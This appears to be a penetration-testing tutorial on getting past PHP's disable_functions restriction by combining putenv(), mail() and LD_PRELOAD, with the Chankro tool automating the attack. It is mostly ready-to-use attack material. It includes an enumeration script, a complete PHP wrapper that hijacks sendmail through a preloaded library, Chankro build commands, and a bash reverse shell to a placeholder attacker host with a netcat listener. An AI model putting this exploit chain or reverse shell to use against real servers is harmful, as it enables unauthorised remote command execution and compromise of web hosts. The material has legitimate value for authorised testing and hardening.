
File Upload Bypass, Bypass Disable Functions

1. Introduction

In hardened PHP environments, one of the most common defensive measures is disabling the functions that allow command execution or process creation at the operating system level.

Functions such as:

  • system()
  • exec()
  • shell_exec()
  • passthru()

are frequently disabled using the `disable_functions` directive in the `php.ini` configuration file.

This restriction is intended to prevent attackers from executing arbitrary system commands even if they gain code execution inside a PHP context.

However, this protection is incomplete.

2. Attack Surface Analysis

While administrators usually focus on well-known dangerous functions, other PHP functions are often overlooked and left enabled.

Examples include:

  • `dl()` allows dynamic loading of PHP extensions
  • `putenv()` allows modification of environment variables
  • `mail()` spawns a system-level mail transfer agent (e.g., `sendmail`)

During a penetration test, a common and critical step is enumerating which PHP functions remain enabled, since a single forgotten function can completely undermine the security model.
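A small enumeration script for this step, added here as an example (it is not part of the original post and not Chankro's code). It reads `disable_functions`, compares a candidate list against it, and prints the settings that decide whether the `LD_PRELOAD` route is usable at all. The file name `enum.php` and the candidate list are this example's assumptions:

```php
<?php
// Added example, not part of the original post: enumerate which
// command-capable functions survive disable_functions on the target.
// Upload it as enum.php (name is an assumption) and request it once;
// it calls nothing that could itself be disabled.

// Candidate list is this example's choice, not an exhaustive catalogue:
// the first row is what administrators usually block, the second row is
// what they usually forget. mail(), mb_send_mail() and error_log() with
// message_type 1 all spawn sendmail_path, so any of them can trigger a
// preloaded library.
$candidates = [
    'system', 'exec', 'shell_exec', 'passthru', 'popen', 'proc_open', 'pcntl_exec',
    'dl', 'putenv', 'mail', 'mb_send_mail', 'error_log', 'imap_open',
];

// disable_functions is a comma-separated list; PHP ignores surrounding whitespace.
$disabled = array_map('strtolower', array_map('trim',
    explode(',', (string) ini_get('disable_functions'))));

$report = [];
foreach ($candidates as $fn) {
    if (in_array($fn, $disabled, true)) {
        $report[$fn] = 'disabled';
    } elseif (!function_exists($fn)) {
        // PHP 8 also hides disabled functions from function_exists(); the
        // in_array() check above keeps the two cases distinguishable.
        $report[$fn] = 'absent';
    } else {
        $report[$fn] = 'ENABLED';
    }
}

// Settings that decide whether the LD_PRELOAD route is actually usable:
// sendmail_path must point at a real binary or mail() never forks, and
// open_basedir restricts where PHP can write the .so in the first place
// (it does not restrict what the loader reads once the variable is set).
$report['sendmail_path'] = ini_get('sendmail_path') ?: '(unset; PHP defaults to sendmail)';
$report['open_basedir']  = ini_get('open_basedir') ?: '(unset)';

header('Content-Type: text/plain');
foreach ($report as $name => $state) {
    printf("%-14s %s\n", $name, $state);
}
```

Any row marked `ENABLED` in the second group is a candidate for the technique below; `putenv` plus any of the sendmail-spawning functions is enough.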

3. Technique Overview

One effective yet still underutilized technique is abusing the combination of:

  • `putenv()`
  • `mail()`
  • the Linux environment variable `LD_PRELOAD`

This technique is not new. It was reported to PHP back in 2008 (by _gat3way_) and still works today in poorly hardened environments.

4. Why `LD_PRELOAD` Works

`LD_PRELOAD` is a Linux environment variable that tells the dynamic linker to load a specified shared object (`.so`) before any other library.

In practice, this means:

  • If a program uses a function from `libc.so`
  • and we provide our own implementation of that function in a malicious `.so`
  • our function will be executed instead of the legitimate one

This allows function hijacking (hooking) at the operating system level.

Crucially:

  • disable_functions affects PHP only
  • LD_PRELOAD operates at the OS loader level

Once PHP spawns a child process, PHP's restrictions no longer apply to that process; only the loader's rules do.

5. Triggering Code Execution via `mail()`

The `mail()` function internally executes the binary configured in `sendmail_path` (typically `sendmail`), which it starts as a child of the PHP worker.

If:

  • putenv() is enabled
  • mail() is enabled

We can:

1. Set `LD_PRELOAD` to point to a malicious shared library
2. Trigger execution via `mail()`
3. Achieve arbitrary command execution without using any disabled PHP function
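The manual wrapper that these three steps describe, added here as an example (not part of the original post and not Chankro's code). It assumes a shared object `hook.so` has already been uploaded to `/var/www/html` alongside the `c.sh` script (both names and paths are assumptions), and that the library's constructor (`__attribute__((constructor))`) first calls `unsetenv("LD_PRELOAD")`, so the payload's own children are not hooked again, and then runs `c.sh`; that is the job Chankro's generated library performs:

```php
<?php
// Added example, not part of the original post and not Chankro's code: the
// minimal manual wrapper that Chankro automates. Assumes hook.so (name and
// path are assumptions) is already on disk and that its constructor unsets
// LD_PRELOAD and then runs the uploaded script.

$so = '/var/www/html/hook.so';   // absolute path: the loader does not search for it

// Preflight: fail loudly instead of hanging the request when the route is closed.
$disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
foreach (['putenv', 'mail'] as $fn) {
    if (in_array($fn, $disabled, true) || !function_exists($fn)) {
        exit("$fn is unavailable; this route is closed\n");
    }
}
if (!is_readable($so)) {
    exit("$so is not readable by the PHP worker\n");
}

// 1. Inject the variable into the PHP worker's own environment. sendmail is
//    started from this process and inherits it, so the loader preloads
//    hook.so before sendmail's main() runs. disable_functions has no say there.
putenv("LD_PRELOAD=$so");

// 2. Spawn sendmail. Recipient, subject and body are irrelevant; the process
//    creation is the point. With a foreground reverse shell in c.sh this call
//    blocks until the shell exits.
$ret = mail('nobody@localhost', 'x', 'x');

// 3. Remove the variable again so later mail() calls in the same worker do not
//    re-run the payload (the process is reused under php-fpm and mod_php).
putenv('LD_PRELOAD');

// mail() reports sendmail's exit status, not whether the constructor fired:
// false after a successful preload is normal if sendmail itself rejected the
// message. False together with a "Could not execute mail delivery program"
// warning means no process was spawned at all (sendmail_path is wrong).
echo $ret ? "sendmail exited 0\n" : "mail() returned false; check sendmail_path\n";
```

The shared object has to be built for the target's architecture and libc; a 64-bit library is silently ignored by a 32-bit `sendmail`, which is why Chankro takes an `--arch` option.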

6. Tooling: Chankro

To automate this technique, we can use Chankro, a tool developed by Tarlogic Security specifically to bypass `disable_functions` using `LD_PRELOAD`.

Purpose of the Tool

Chankro:

  • Generates a malicious `.so` library
  • Creates a PHP wrapper that sets `LD_PRELOAD`
  • Triggers execution via `mail()`
  • Executes an attacker-controlled payload

7. Installation

```bash
git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help
```

⚠️ Note: Chankro requires Python 2

8. Usage

Create a bash script `c.sh` that opens a reverse shell connection:

```bash
#!/bin/bash
/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
```

Generate the Exploit

```bash
python2 chankro.py \
  --arch 64 \
  --input c.sh \
  --output The_File_You_Will_Upload.php \
  --path /var/www/html
```

Chankro writes a single PHP file that carries the shared object and your script and drops both into the directory given by `--path` at request time, so that directory must be writable by the web server user and `--arch` must match the target (32 or 64). Start a listener (for example `nc -lvnp <LPORT>`), upload the PHP file, then request it in the browser: the wrapper sets `LD_PRELOAD`, calls `mail()`, and the reverse shell connects back.